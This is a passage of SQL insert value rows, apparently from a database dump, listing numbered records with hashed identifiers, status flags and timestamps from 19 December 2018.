(40758, '5ad6a96d36b859541aa2bfee0a9b5007', 'a1e037e0da45db69', 0, 2, 1, '2018-12-19 13:46:55'),
(40759, '5ad6a96d36b859541aa2bfee0a9b5007', 'a1e037e0da45db69', 0, 2, 1, '2018-12-19 13:47:15'),
(40760, 'd369fa044113acf36c2d29c7a0bcb4fe', 'c870225cd582721c', 0, 2, 1, '2018-12-19 13:52:57'),
(40761, '1ddda938158c585365eff723b5cd7c0b', '88e7ec4e3eea4341', 0, 2, 1, '2018-12-19 13:52:57'),
(40762, 'c6376021988dceee99eb6c6e3065936e', 'f7950efbd0cfc5d4', 0, 2, 1, '2018-12-19 14:15:59'),
(40763, 'b7f0846d94f02e365036aa2742228506', 'f4af655ed19af38b', 0, 2, 1, '2018-12-19 14:37:19'),
(40764, 'fc049830828a46c301e50b2a456ee797', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-19 14:40:52'),
(40765, '6f75e88f5f0b90fa734f69d4d504e817', 'bc5a9dc728ad22f7', 0, 2, 1, '2018-12-19 14:48:05'),
(40766, '8cad68fa3b2ccf589c97acaf3d6a8d9c', 'ee048a80ed202af2', 0, 2, 1, '2018-12-19 15:22:46'),
(40767, '8cad68fa3b2ccf589c97acaf3d6a8d9c', 'ee048a80ed202af2', 0, 2, 1, '2018-12-19 15:22:59'),
(40768, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-19 15:35:55'),
(40769, '0bd716a2d50c64656e51c58d92b73a67', '5e490869ef3c5080', 0, 2, 1, '2018-12-19 15:36:38'),
(40770, '50be1d539aaf244eac73de92aa3afe75', '6b5022260596dc2a', 0, 2, 1, '2018-12-19 15:41:52'),
(40771, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 15:42:40'),
(40772, 'ec02b5ceecfc87f9039d1b03a549e442', 'f115708352679186', 0, 2, 1, '2018-12-19 15:45:49'),
(40773, '8cad68fa3b2ccf589c97acaf3d6a8d9c', 'ee048a80ed202af2', 0, 2, 1, '2018-12-19 15:48:18'),
(40774, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-19 15:50:22'),
(40775, '6d964550325a657416304accea8c4254', '59bb5978882acfd8', 0, 2, 1, '2018-12-19 15:51:41'),
(40776, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-19 15:51:59'),
(40777, '533c102326c6d0f001f677faf88c3b70', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-19 15:52:10'),
(40778, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 15:53:59'),
(40779, '533c102326c6d0f001f677faf88c3b70', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-19 15:55:13'),
(40780, 'c04ffca6c5a8ba7bba6099e506d0c943', '32b169e936bbe5df', 0, 2, 1, '2018-12-19 15:56:14'),
(40781, 'c4aafed9c1f827a1d198a6890ebb3731', 'df27b9a2919a8206', 0, 2, 1, '2018-12-19 15:56:39'),
(40782, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 15:59:04'),
(40783, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 15:59:25'),
(40784, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 16:00:25'),
(40785, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-19 16:00:53'),
(40786, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 16:01:16'),
(40787, '8d6bbfb3639f039a68eacfff70b21fa7', '74aba437eea39f30', 0, 2, 1, '2018-12-19 16:02:55'),
(40788, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 16:03:02'),
(40789, '62a47cfa6c7a30599713caf5f1645c6c', '85119d340f6fafd4', 0, 2, 1, '2018-12-19 16:04:12'),
(40790, '62a47cfa6c7a30599713caf5f1645c6c', '85119d340f6fafd4', 0, 2, 1, '2018-12-19 16:04:43'),
(40791, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 16:05:43'),
(40792, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 16:05:57'),
(40793, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-19 16:08:37'),
(40794, 'e9772f87ebdeb62af7e3808f1d0301c6', '3233431a244017cd', 0, 2, 1, '2018-12-19 16:10:05'),
(40795, 'cd2ca2da7ca8d6c3ebbe616fcb377c90', 'f30a4aa7cb3c5340', 0, 2, 1, '2018-12-19 16:10:10'),
(40796, 'da9c7020753a0bfc99e05bc0041d40ab', 'dba49dcafdc2b991', 0, 2, 1, '2018-12-19 16:10:15'),
(40797, '61126c6f90c921d373c13fababa371f6', '196ae7616c94df27', 0, 2, 1, '2018-12-19 16:12:16'),
(40798, '1d66dac68c583600adbae488eea298a6', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-19 16:13:11'),
(40799, '62a47cfa6c7a30599713caf5f1645c6c', '85119d340f6fafd4', 0, 2, 1, '2018-12-19 16:13:17'),
(40800, 'cc700a695fc7be763f6433afbf726f7b', '4574603cf07e6399', 0, 2, 1, '2018-12-19 16:13:27'),
(40801, '62a47cfa6c7a30599713caf5f1645c6c', '85119d340f6fafd4', 0, 2, 1, '2018-12-19 16:13:39'),
(40802, '1bfd8e11588f7af630da871e4c3daf92', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-19 16:14:58'),
(40803, '8e8f66048911b4bf87352add530ad82f', '1df2ec14e12c5a30', 0, 2, 1, '2018-12-19 16:15:07'),
(40804, '811fb20eb516517ca8a11270934ec8ec', 'fd9e13a25e929cea', 0, 2, 1, '2018-12-19 16:15:11'),
(40805, 'e9772f87ebdeb62af7e3808f1d0301c6', '3233431a244017cd', 0, 2, 1, '2018-12-19 16:16:14'),
(40806, '7bb8acd6871d6a8341fc320ef0ade5d3', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 16:16:22'),
(40807, 'edcbea329a6be93d546ab87827ec8017', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-19 16:18:01'),
(40808, 'c04ffca6c5a8ba7bba6099e506d0c943', '32b169e936bbe5df', 0, 2, 1, '2018-12-19 16:18:09'),
(40809, '9d2d30949bf7da2edbd67d0399f59281', '9a1a9db6d4db8522', 0, 2, 1, '2018-12-19 16:18:16'),
(40810, 'da9c7020753a0bfc99e05bc0041d40ab', 'dba49dcafdc2b991', 0, 2, 1, '2018-12-19 16:20:28'),
(40811, 'd3d31720e2f2210a9583de5b37f55a61', '8f39a0f22ed60405', 0, 2, 1, '2018-12-19 16:21:49'),
(40812, '62a47cfa6c7a30599713caf5f1645c6c', '85119d340f6fafd4', 0, 2, 1, '2018-12-19 16:22:44'),
(40813, '62a47cfa6c7a30599713caf5f1645c6c', '85119d340f6fafd4', 0, 2, 1, '2018-12-19 16:23:08'),
(40814, '62a47cfa6c7a30599713caf5f1645c6c', '85119d340f6fafd4', 0, 2, 1, '2018-12-19 16:23:17'),
(40815, '62a47cfa6c7a30599713caf5f1645c6c', '85119d340f6fafd4', 0, 2, 1, '2018-12-19 16:23:27'),
(40816, '3f9cebccfa4c84364e63e68dda735eb1', '5cfa5cadedc245cc', 0, 2, 1, '2018-12-19 16:23:30'),
(40817, '3f9cebccfa4c84364e63e68dda735eb1', '5cfa5cadedc245cc', 0, 2, 1, '2018-12-19 16:23:53'),
(40818, 'd18cad4e288ffe4c28724cdf80bd7c28', 'b0d0f692147f0dd4', 0, 2, 1, '2018-12-19 16:24:20'),
(40819, '6b345f33dbb86dba28f764914bb2a908', 'ac1257653a309ba1', 0, 2, 1, '2018-12-19 16:24:51'),
(40820, '35e6fa88721b9db38ef86c85c6f1ed8c', '1c68b977b911188c', 0, 2, 1, '2018-12-19 16:24:56'),
(40821, 'fdee931b3802663d7eab25fc37e1303c', '7cd748af470b76f4', 0, 2, 1, '2018-12-19 16:26:09'),
(40822, 'da9c7020753a0bfc99e05bc0041d40ab', 'dba49dcafdc2b991', 0, 2, 1, '2018-12-19 16:27:17'),
(40823, '6b345f33dbb86dba28f764914bb2a908', 'ac1257653a309ba1', 0, 2, 1, '2018-12-19 16:28:22'),
(40824, '6b345f33dbb86dba28f764914bb2a908', 'ac1257653a309ba1', 0, 2, 1, '2018-12-19 16:28:40'),
(40825, 'c04ffca6c5a8ba7bba6099e506d0c943', '32b169e936bbe5df', 0, 2, 1, '2018-12-19 16:28:45'),
(40826, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-19 16:28:46'),
(40827, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-19 16:28:53'),
(40828, '62a47cfa6c7a30599713caf5f1645c6c', '85119d340f6fafd4', 0, 2, 1, '2018-12-19 16:29:15'),
(40829, '35e6fa88721b9db38ef86c85c6f1ed8c', '1c68b977b911188c', 0, 2, 1, '2018-12-19 16:29:52'),
(40830, 'fd75412c9051334861aa2818489b44dc', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-19 16:30:38'),
(40831, 'fd75412c9051334861aa2818489b44dc', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-19 16:30:48'),
(40832, '4c293aaf81bf810d6e65eae55fcc96e7', '798d56d8d5e68e06', 0, 2, 1, '2018-12-19 16:31:28'),
(40833, 'fd75412c9051334861aa2818489b44dc', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-19 16:31:29'),
(40834, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 16:31:45'),
(40835, '44ebd6e4a4c5420af6f1235427b37d1d', 'd7036fef56eff751', 0, 2, 1, '2018-12-19 16:31:49'),
(40836, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 16:32:07'),
(40837, 'cc0b2c1cecb4438a8c39b7d85861983b', 'b603708ce5ac82cb', 0, 2, 1, '2018-12-19 16:33:04'),
(40838, '902aae5598a22fe5f4c7c24912290dd3', '049dbeed11095c77', 0, 2, 1, '2018-12-19 16:33:07'),
(40839, 'cc0b2c1cecb4438a8c39b7d85861983b', 'b603708ce5ac82cb', 0, 2, 1, '2018-12-19 16:33:13'),
(40840, '27ea7f70fc102e5e15db0a912fdf13fc', 'f61be112d9cb2646', 0, 2, 1, '2018-12-19 16:33:38'),
(40841, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 16:34:22'),
(40842, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 16:34:32'),
(40843, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 16:35:08'),
(40844, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 16:35:16'),
(40845, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 16:36:06'),
(40846, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 16:36:13'),
(40847, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 16:36:22'),
(40848, '6e7c9846a5f1ec388d8e759f177de94a', '3a5b281c14620e5b', 0, 2, 1, '2018-12-19 16:39:00'),
(40849, '6f0cdd060a2e0f677098eb134727856a', '9fa71c818742c95f', 0, 2, 1, '2018-12-19 16:40:23'),
(40850, '879e0308acc29f096d7d65ea56e6cef9', '455b7af7b80ccb4a', 0, 2, 1, '2018-12-19 16:41:27'),
(40851, '0594894c794f6f6f46251aad9190549a', '6d1ffcb547e63dc2', 0, 2, 1, '2018-12-19 16:42:51'),
(40852, 'd5160bebe02d13c0f5a8afd01667cb60', '3dbdca4cc0a8dcd5', 0, 2, 1, '2018-12-19 16:43:59'),
(40853, 'b4ea3122b109ff21d5d7736fe2b08148', '1250d46067afca9c', 0, 2, 1, '2018-12-19 16:44:05'),
(40854, '7fb5aff68e7da74bc8f06d6de8754b29', '8e9e7816173ea9db', 0, 2, 1, '2018-12-19 16:44:37'),
(40855, '7fb5aff68e7da74bc8f06d6de8754b29', '8e9e7816173ea9db', 0, 2, 1, '2018-12-19 16:44:47'),
(40856, 'f7cd717c92ee3a59bae749e575f58a8f', 'd11c71184ec28f6f', 0, 2, 1, '2018-12-19 16:45:02'),
(40857, '9ca444f91da16cfb26228ecccb0f59e4', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-19 16:45:06'),
(40858, '3f9cebccfa4c84364e63e68dda735eb1', '5cfa5cadedc245cc', 0, 2, 1, '2018-12-19 16:45:42'),
(40859, 'c3febd9370fe19d642c94916bde77d01', 'e83bb1e1c9222cc6', 0, 2, 1, '2018-12-19 16:46:16'),
(40860, 'f7cd717c92ee3a59bae749e575f58a8f', 'd11c71184ec28f6f', 0, 2, 1, '2018-12-19 16:50:04'),
(40861, 'ad8dde9f5b7a66718affee414fea342a', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-19 16:51:10'),
(40862, 'dde5292e5593ce43b5ba3cdbe4e5aff4', '552f828db01a4f62', 0, 2, 1, '2018-12-19 16:51:11'),
(40863, 'dde5292e5593ce43b5ba3cdbe4e5aff4', '552f828db01a4f62', 0, 2, 1, '2018-12-19 16:51:59'),
(40864, 'a62eedd637bdcea72808b38305d99903', '4a7924dd4418962c', 0, 2, 1, '2018-12-19 16:52:13'),
(40865, 'a62eedd637bdcea72808b38305d99903', '4a7924dd4418962c', 0, 2, 1, '2018-12-19 16:52:34'),
(40866, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-19 16:53:34'),
(40867, '54f8b65ee736d742d7bef3506de1c907', '56456f5bcf4f4860', 0, 2, 1, '2018-12-19 16:57:21'),
(40868, '89a554083f4db58bf3eda1791c49e630', '5343db3c3c0d2ebe', 0, 2, 1, '2018-12-19 16:58:09'),
(40869, '8d36b4576d41013dfc3371bd50ace7dc', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-19 16:58:33'),
(40870, '8d36b4576d41013dfc3371bd50ace7dc', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-19 16:59:34'),
(40871, '8d36b4576d41013dfc3371bd50ace7dc', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-19 16:59:39'),
(40872, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2018-12-19 17:01:59'),
(40873, '7bb8acd6871d6a8341fc320ef0ade5d3', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 17:06:48'),
(40874, '3bcbef0ed6e066b6d6c8a71beebaf71a', '3cb6f2f13f69fca9', 0, 2, 1, '2018-12-19 17:07:39'),
(40875, '57621c839702622529d9177a0f1ada84', 'a5bf2291f3000ddb', 0, 2, 1, '2018-12-19 17:10:37'),
(40876, '196b39a87a642bac7f97110c4ccca5ee', '8c8fdaa3500c622e', 0, 2, 1, '2018-12-19 17:12:14'),
(40877, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-19 17:12:21'),
(40878, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-19 17:15:06'),
(40879, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-19 17:17:21'),
(40880, 'ac85a15b38afc653152ba11d31a2cf8a', '8d0eb2404f7f641b', 0, 2, 1, '2018-12-19 17:19:20'),
(40881, '19e7ff979f43e321a802abad1bf178c1', 'dcadb578720d99b9', 0, 2, 1, '2018-12-19 17:21:31'),
(40882, '5cab856a7761672adc4bb91950585361', 'e7d8179d5045adbc', 0, 2, 1, '2018-12-19 17:22:38'),
(40883, '19e7ff979f43e321a802abad1bf178c1', 'dcadb578720d99b9', 0, 2, 1, '2018-12-19 17:23:32'),
(40884, '19e7ff979f43e321a802abad1bf178c1', 'dcadb578720d99b9', 0, 2, 1, '2018-12-19 17:23:47'),
(40885, 'e03d8d091f3fe75d6b7fd9e86aa15b6f', 'ff51549cbdca4927', 0, 2, 1, '2018-12-19 17:25:30'),
(40886, 'e03d8d091f3fe75d6b7fd9e86aa15b6f', 'ff51549cbdca4927', 0, 2, 1, '2018-12-19 17:25:53'),
(40887, '9ca444f91da16cfb26228ecccb0f59e4', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-19 17:26:09'),
(40888, '18b8a32aed470384ad5f323777cf093e', '42a1692e91c7e004', 0, 2, 1, '2018-12-19 17:32:34'),
(40889, '3bd8a4b54c69aa63a73c4a9552d3a65e', '83bb13387505b354', 0, 2, 1, '2018-12-19 17:32:58'),
(40890, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-19 17:33:14'),
(40891, '9521a0e3293ca39979a9c052f413da36', '2b8914e50837b1d4', 0, 2, 1, '2018-12-19 17:33:47'),
(40892, '18b8a32aed470384ad5f323777cf093e', '42a1692e91c7e004', 0, 2, 1, '2018-12-19 17:36:37'),
(40893, '02523c1e7077f3849fd65e6746fcedaa', 'b603708ce5ac82cb', 0, 2, 1, '2018-12-19 17:36:44'),
(40894, '9521a0e3293ca39979a9c052f413da36', '2b8914e50837b1d4', 0, 2, 1, '2018-12-19 17:37:37'),
(40895, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 17:42:35'),
(40896, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 17:42:47'),
(40897, 'ce642335ceacd38f4de652f9eca4f47b', '4574603cf07e6399', 0, 2, 1, '2018-12-19 17:42:53'),
(40898, '7fb5aff68e7da74bc8f06d6de8754b29', '8e9e7816173ea9db', 0, 2, 1, '2018-12-19 17:44:14'),
(40899, '7bb8acd6871d6a8341fc320ef0ade5d3', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 17:44:23'),
(40900, 'dffbb6623e5093ed972cb2a4b37d3ed9', '6e117bd555667400', 0, 2, 1, '2018-12-19 17:44:33'),
(40901, 'ce642335ceacd38f4de652f9eca4f47b', '4574603cf07e6399', 0, 2, 1, '2018-12-19 17:44:34'),
(40902, '18b8a32aed470384ad5f323777cf093e', '42a1692e91c7e004', 0, 2, 1, '2018-12-19 17:44:41'),
(40903, 'dffbb6623e5093ed972cb2a4b37d3ed9', '6e117bd555667400', 0, 2, 1, '2018-12-19 17:44:57'),
(40904, '7fb5aff68e7da74bc8f06d6de8754b29', '8e9e7816173ea9db', 0, 2, 1, '2018-12-19 17:45:02'),
(40905, '3f9cebccfa4c84364e63e68dda735eb1', '5cfa5cadedc245cc', 0, 2, 1, '2018-12-19 17:45:13'),
(40906, '4c293aaf81bf810d6e65eae55fcc96e7', '798d56d8d5e68e06', 0, 2, 1, '2018-12-19 17:45:23'),
(40907, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 17:45:27'),
(40908, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-19 17:45:32'),
(40909, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 17:45:39'),
(40910, '7bb8acd6871d6a8341fc320ef0ade5d3', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 17:46:02'),
(40911, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 17:46:14'),
(40912, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 17:46:18'),
(40913, '57621c839702622529d9177a0f1ada84', 'a5bf2291f3000ddb', 0, 2, 1, '2018-12-19 17:46:25'),
(40914, '7fb5aff68e7da74bc8f06d6de8754b29', '8e9e7816173ea9db', 0, 2, 1, '2018-12-19 17:46:34'),
(40915, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 17:46:36'),
(40916, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2018-12-19 17:46:42'),
(40917, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 17:46:49'),
(40918, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 17:46:53'),
(40919, 'd5367e625568c2ce0ad4833083df5559', 'f6269ce34ab6a362', 0, 2, 1, '2018-12-19 17:46:58'),
(40920, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 17:47:07'),
(40921, '3f9cebccfa4c84364e63e68dda735eb1', '5cfa5cadedc245cc', 0, 2, 1, '2018-12-19 17:47:20'),
(40922, '7bb8acd6871d6a8341fc320ef0ade5d3', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 17:47:30'),
(40923, '8d36b4576d41013dfc3371bd50ace7dc', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-19 17:48:01'),
(40924, '9521a0e3293ca39979a9c052f413da36', '2b8914e50837b1d4', 0, 2, 1, '2018-12-19 17:48:22'),
(40925, '0abc390e7d55eced5903efd53cd22448', 'cad202a09758cb3a', 0, 2, 1, '2018-12-19 17:48:31'),
(40926, 'e71b1ca5b193f9362dd7493fd8f61733', '21a75882f832ae93', 0, 2, 1, '2018-12-19 17:48:32'),
(40927, '0abc390e7d55eced5903efd53cd22448', 'cad202a09758cb3a', 0, 2, 1, '2018-12-19 17:48:39'),
(40928, 'e9772f87ebdeb62af7e3808f1d0301c6', '3233431a244017cd', 0, 2, 1, '2018-12-19 17:49:34'),
(40929, 'e9772f87ebdeb62af7e3808f1d0301c6', '3233431a244017cd', 0, 2, 1, '2018-12-19 17:49:36'),
(40930, '4c293aaf81bf810d6e65eae55fcc96e7', '798d56d8d5e68e06', 0, 2, 1, '2018-12-19 17:49:57'),
(40931, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 17:50:03'),
(40932, '0abc390e7d55eced5903efd53cd22448', 'cad202a09758cb3a', 0, 2, 1, '2018-12-19 17:50:39'),
(40933, '9521a0e3293ca39979a9c052f413da36', '2b8914e50837b1d4', 0, 2, 1, '2018-12-19 17:50:39'),
(40934, 'e9772f87ebdeb62af7e3808f1d0301c6', '3233431a244017cd', 0, 2, 1, '2018-12-19 17:51:49'),
(40935, 'fd75412c9051334861aa2818489b44dc', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-19 17:51:59'),
(40936, 'fd75412c9051334861aa2818489b44dc', 'cdece7d9f3e75b7a', 0, 2, 1, '2018-12-19 17:52:07'),
(40937, '8d36b4576d41013dfc3371bd50ace7dc', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-19 17:53:05'),
(40938, '0abc390e7d55eced5903efd53cd22448', 'cad202a09758cb3a', 0, 2, 1, '2018-12-19 17:53:48'),
(40939, '8d36b4576d41013dfc3371bd50ace7dc', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-19 17:54:24'),
(40940, '0bbd04b99665822449fc3e6d3e7d6870', '105ab72e174ced3e', 0, 2, 1, '2018-12-19 17:57:24'),
(40941, '0bbd04b99665822449fc3e6d3e7d6870', '105ab72e174ced3e', 0, 2, 1, '2018-12-19 18:00:12'),
(40942, '9ca444f91da16cfb26228ecccb0f59e4', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-19 18:00:51'),
(40943, 'ab834a880173babbe53a7147c86c085c', 'acb5efae6e464d75', 0, 2, 1, '2018-12-19 18:01:09'),
(40944, '0bbd04b99665822449fc3e6d3e7d6870', '105ab72e174ced3e', 0, 2, 1, '2018-12-19 18:01:20'),
(40945, '0bbd04b99665822449fc3e6d3e7d6870', '105ab72e174ced3e', 0, 2, 1, '2018-12-19 18:02:28'),
(40946, 'e1d6d5bc986209ef5cff11c3b99285f5', '8983de37a172415b', 0, 2, 1, '2018-12-19 18:02:50'),
(40947, '0bbd04b99665822449fc3e6d3e7d6870', '105ab72e174ced3e', 0, 2, 1, '2018-12-19 18:03:25'),
(40948, 'aef7d4cabd9c096a47b1b51450398827', '54c6c0fa0e212c40', 0, 2, 1, '2018-12-19 18:04:11'),
(40949, 'ebdd88a7016b868c519e960b93de59eb', '1c68b977b911188c', 0, 2, 1, '2018-12-19 18:08:11'),
(40950, '40a3d4149a1cb73832e4392445bfa408', '3f61181dbb8e17fb', 0, 2, 1, '2018-12-19 18:11:21'),
(40951, 'dffbb6623e5093ed972cb2a4b37d3ed9', '6e117bd555667400', 0, 2, 1, '2018-12-19 18:12:02'),
(40952, 'e9772f87ebdeb62af7e3808f1d0301c6', '3233431a244017cd', 0, 2, 1, '2018-12-19 18:13:13'),
(40953, '8d36b4576d41013dfc3371bd50ace7dc', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-19 18:14:36'),
(40954, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-19 18:18:24'),
(40955, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-19 18:19:50'),
(40956, 'bf3872b7c056ca82bc36259bdf706cd4', '8a144e5fc2e94311', 0, 2, 1, '2018-12-19 18:20:20'),
(40957, 'c7abae36a085334cb3d0c9fbfd7bf96a', 'e3038f2b751243df', 0, 2, 1, '2018-12-19 18:20:59'),
(40958, '91eb6e7a3c593c7be1ba52fdcbc87eb6', '85c05c059b3af615', 0, 2, 1, '2018-12-19 18:21:58'),
(40959, 'bf3872b7c056ca82bc36259bdf706cd4', '8a144e5fc2e94311', 0, 2, 1, '2018-12-19 18:22:23'),
(40960, '77103285c4ae2b1eb5da32899f720592', 'c123e74a1d22036a', 0, 2, 1, '2018-12-19 18:22:56'),
(40961, '77103285c4ae2b1eb5da32899f720592', 'c123e74a1d22036a', 0, 2, 1, '2018-12-19 18:23:01'),
(40962, '77103285c4ae2b1eb5da32899f720592', 'c123e74a1d22036a', 0, 2, 1, '2018-12-19 18:23:25'),
(40963, 'dffbb6623e5093ed972cb2a4b37d3ed9', '6e117bd555667400', 0, 2, 1, '2018-12-19 18:24:05'),
(40964, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:24:10'),
(40965, 'bf3872b7c056ca82bc36259bdf706cd4', '8a144e5fc2e94311', 0, 2, 1, '2018-12-19 18:24:12'),
(40966, 'c7abae36a085334cb3d0c9fbfd7bf96a', 'e3038f2b751243df', 0, 2, 1, '2018-12-19 18:24:26'),
(40967, 'a425b236c1dec454e0e751358bc643ce', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-19 18:24:26'),
(40968, 'a425b236c1dec454e0e751358bc643ce', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-19 18:24:34'),
(40969, 'f4675ef81d1d7e0985f9b4725ffd53fd', 'e706e9a0184b2202', 0, 2, 1, '2018-12-19 18:24:35'),
(40970, 'c07b27f4d823fa4c548d79fdc85cef28', 'dace6e0c219330fc', 0, 2, 1, '2018-12-19 18:24:43'),
(40971, '7bb8acd6871d6a8341fc320ef0ade5d3', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 18:24:47'),
(40972, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 18:24:50'),
(40973, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 18:24:59'),
(40974, 'c4aafed9c1f827a1d198a6890ebb3731', 'df27b9a2919a8206', 0, 2, 1, '2018-12-19 18:25:04'),
(40975, '317e28971460944a715488c01178478c', 'dba49dcafdc2b991', 0, 2, 1, '2018-12-19 18:25:05'),
(40976, '75730a57bc73700b2e190a554012583e', '503a514a8daa32a7', 0, 2, 1, '2018-12-19 18:25:07'),
(40977, 'ad8dde9f5b7a66718affee414fea342a', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-19 18:25:07'),
(40978, 'c04ffca6c5a8ba7bba6099e506d0c943', '32b169e936bbe5df', 0, 2, 1, '2018-12-19 18:25:09'),
(40979, '23bcc3a54b1834c2ae410d25bc56a89c', 'c858904cdd51199c', 0, 2, 1, '2018-12-19 18:25:15'),
(40980, '7bb8acd6871d6a8341fc320ef0ade5d3', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-19 18:25:18'),
(40981, 'ad8dde9f5b7a66718affee414fea342a', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-19 18:25:20'),
(40982, '61126c6f90c921d373c13fababa371f6', '196ae7616c94df27', 0, 2, 1, '2018-12-19 18:25:29'),
(40983, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-19 18:25:30'),
(40984, '37e1a82e135df305646b770cb59ce8f8', '4c07673592205f17', 0, 2, 1, '2018-12-19 18:25:34'),
